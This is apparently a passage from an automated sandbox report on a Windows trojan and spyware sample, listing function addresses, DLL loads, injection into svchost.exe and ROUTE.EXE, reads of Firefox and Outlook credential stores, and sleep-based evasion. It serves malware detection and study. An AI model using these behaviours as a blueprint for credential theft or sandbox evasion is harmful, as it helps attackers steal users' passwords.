                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031195C36_2_031195C3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310F43F6_2_0310F43F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030414606_2_03041460
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310FB766_2_0310FB76
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306FB806_2_0306FB80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0308DBF96_2_0308DBF9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030C5BF06_2_030C5BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03107A466_2_03107A46
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310FA496_2_0310FA49
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030C3A6C6_2_030C3A6C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030EDAAC6_2_030EDAAC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03095AA06_2_03095AA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F1AA36_2_030F1AA3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030FDAC66_2_030FDAC6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030E59106_2_030E5910
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030599506_2_03059950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306B9506_2_0306B950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030BD8006_2_030BD800
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030538E06_2_030538E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310FF096_2_0310FF09
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03051F926_2_03051F92
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310FFB16_2_0310FFB1
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03013FD26_2_03013FD2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03013FD56_2_03013FD5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03059EB06_2_03059EB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03053D406_2_03053D40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03101D5A6_2_03101D5A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03107D736_2_03107D73
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306FDC06_2_0306FDC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030C9C326_2_030C9C32
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310FCF26_2_0310FCF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_029022206_2_02902220
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0291C0906_2_0291C090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FB2E06_2_028FB2E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FD3006_2_028FD300
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FD0DA6_2_028FD0DA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FD0E06_2_028FD0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FB4356_2_028FB435
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_028FB4306_2_028FB430
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02903AF06_2_02903AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02903AEB6_2_02903AEB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_029058E06_2_029058E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFE3046_2_02EFE304
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFE7C46_2_02EFE7C4
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFE4236_2_02EFE423
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFCAE86_2_02EFCAE8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFCB536_2_02EFCB53
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02EFD8886_2_02EFD888
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: String function: 00C88900 appears 42 times
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: String function: 00C67DE1 appears 35 times
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: String function: 00C80AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 107 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030BEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03097E54 appears 107 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0303B970 appears 262 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 030CF290 appears 103 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03085130 appears 58 times
                Source: CJE003889.exe, 00000000.00000003.1677477765.000000000376D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CJE003889.exe
                Source: CJE003889.exe, 00000000.00000003.1676691933.00000000035C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CJE003889.exe
                Source: CJE003889.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@9/8
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCA06A GetLastError,FormatMessageW,0_2_00CCA06A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB81CB AdjustTokenPrivileges,CloseHandle,0_2_00CB81CB
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CB87E1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CCB3FB
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CDEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CDEE0D
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00CCC397
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C64E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C64E89
                Source: C:\Users\user\Desktop\CJE003889.exeFile created: C:\Users\user\AppData\Local\Temp\autBA2.tmpJump to behavior
                Source: CJE003889.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ROUTE.EXE, 00000006.00000003.2325539790.0000000002ABF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3491093928.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2325667205.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CJE003889.exeReversingLabs: Detection: 26%
                Source: CJE003889.exeVirustotal: Detection: 26%
                Source: unknownProcess created: C:\Users\user\Desktop\CJE003889.exe "C:\Users\user\Desktop\CJE003889.exe"
                Source: C:\Users\user\Desktop\CJE003889.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CJE003889.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"Jump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: CJE003889.exeStatic file information: File size 1229312 > 1048576
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: CJE003889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mcPAaApkdo.exe, 00000005.00000000.2065667127.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215787915.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
                Source: CJE003889.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: CJE003889.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: CJE003889.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: CJE003889.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: CJE003889.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C64B37 LoadLibraryA,GetProcAddress,0_2_00C64B37
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C764CE push cs; retf 0_2_00C764E2
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC848F push FFFFFF8Bh; iretd 0_2_00CC8491
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C7659F push cs; retf 0_2_00C765DE
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C76500 push cs; retf 0_2_00C76502
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8E70F push edi; ret 0_2_00C8E711
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8E828 push esi; ret 0_2_00C8E82A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C88945 push ecx; ret 0_2_00C88958
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8EAEC push edi; ret 0_2_00C8EAEE
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8EA03 push esi; ret 0_2_00C8EA05
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C78C74 push esp; retf 0_2_00C78C76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415ED3 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004149FF push cs; iretd 1_2_00414A15
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031B0 push eax; ret 1_2_004031B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415AC5 push esi; retf 1_2_00415AC9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183BF push ebx; ret 1_2_004183C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415C9E push eax; iretd 1_2_00415CA2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411D0F push cs; iretd 1_2_00411D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414DF9 push FFFFFFB4h; retf 1_2_00414DFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E22 push esp; ret 1_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004016FF push edi; ret 1_2_00401701
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041468B push ecx; ret 1_2_0041468C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040171C push ss; ret 1_2_00401723
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415F38 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418FDC push edx; iretd 1_2_00418FDD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0225F pushad ; ret 1_2_03B027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B027FA pushad ; ret 1_2_03B027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx1_2_03B309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0283D push eax; iretd 1_2_03B02858
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0301225F pushad ; ret 6_2_030127F9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030127FA pushad ; ret 6_2_030127F9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030409AD push ecx; mov dword ptr [esp], ecx6_2_030409B6
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C648D7
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CE5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CE5376
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C83187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C83187
                Source: C:\Users\user\Desktop\CJE003889.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\CJE003889.exeAPI/Special instruction interceptor: Address: 1016424
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
                Source: C:\Users\user\Desktop\CJE003889.exeAPI coverage: 5.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 3052Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 3052Thread sleep time: -76000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe TID: 5220Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe TID: 5220Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CC445A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCC6D1 FindFirstFileW,FindClose,0_2_00CCC6D1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CCC75C
